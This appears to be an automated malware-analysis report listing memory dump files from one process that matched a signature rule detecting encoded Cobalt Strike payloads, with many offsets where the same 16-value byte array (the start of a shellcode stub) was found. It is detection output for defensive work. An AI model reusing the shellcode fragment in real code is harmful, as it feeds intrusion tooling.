00000019.00000003.508725411.0000000005CBA000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1758:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3340:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4f28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500355385.0000000006DEE000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1918:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499979043.0000000006E3A000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x33a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000002.568622396.0000000006E13000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x80:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500225710.0000000006E0E000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1cc8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.506934087.00000000060F7000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1858:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3a70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5c88:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7ea0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa0c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc2f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe518:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10740:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12968:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14b90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16dc8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19000:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b238:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d470:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f6a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x218e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23b18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25d60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27fa8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2a1f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2c438:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.506382622.00000000062DB000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1620:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3ab8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5f50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x83e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa880:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xcd28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf1d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11678:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500146207.0000000006E1E000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1fb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.503951630.0000000006608000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x8c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x31e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5b08:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8430:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xad58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd680:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xffa8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x128e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15218:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17b50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1a488:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1cdc0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f6f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22040:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24988:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x272d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x29c18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2c560:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2eeb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x31810:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x34168:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500435591.0000000006DDC000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x4e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.500214700.0000000006E11000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x2080:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.509015844.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1730:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x31b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4c40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x66c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8160:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9bf8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb690:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd128:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xebc0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10668:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12110:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13bb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15660:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x17108:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18bb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1a668:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1c120:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1dbd8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f690:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21158:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x22c20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.499330598.0000000006CBF000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xba0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3c88:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6d70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9e58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xcf50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10048:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13140:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16248:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19360:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1c478:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f5a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x226c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x257f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x28928:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2ba60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2eb98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x31ce0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x34e38:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x37f90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3b0e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3e250:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.505281515.0000000006456000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xe18:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x34d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5b98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8260:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa928:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xcff0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf6c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11da0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14478:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508508228.0000000005D3A000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xc78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2930:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x45e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x62a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7f58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9c20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb8e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd5b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf278:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x10f50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12c28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x14900:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x165d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x182c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19fa8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1bc90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d978:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f660:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21358:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23050:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24d48:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.507143214.0000000006072000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1850:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x39c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5b40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7cb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x9e30:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xbfb8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xe140:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x102c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12450:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x145d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x16760:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x188f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1aa90:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1cc28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1edc0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20f58:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x230f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25298:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27440:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x295e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2b790:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.509189150.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x13c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2de0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x47f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7228:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8c50:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa678:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc0a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xdac8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf500:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.507585756.0000000005F67000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1288:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3290:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5298:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x72b0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x92c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb2e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd2f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xf310:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11328:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13350:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15378:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x173a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x193c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b3f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1d428:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1f460:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21498:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x234d0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25508:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x27550:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x29598:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.501274310.0000000006AFF000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1608:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4490:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7318:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa1a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xd038:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xfed0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x12d68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15c00:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18a98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1b940:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1e7e8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21690:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x24538:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x273e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2a288:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2d140:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x2fff8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x32eb0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x35d68:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x38c20:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3bad8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508358895.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1450:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x3158:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x4e60:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x6b78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x8890:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xa5a8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xc2c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xdfd8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xfd00:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x11a28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13750:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15478:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x171a0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x18ed8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1ac10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1c948:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1e680:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x203b8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x220f0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23e28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x25b70:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
00000019.00000003.508666437.0000000005CC0000.00000004.00000800.00020000.00000000.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0xb10:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x26f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x42e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x5ed8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x7ad0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x96c8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xb2c0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xcec8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0xead0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x106d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x122e0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x13ee8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x15af0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x176f8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x19310:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1af28:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1cb40:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x1e758:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x20370:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x21f98:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117 0x23bc0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
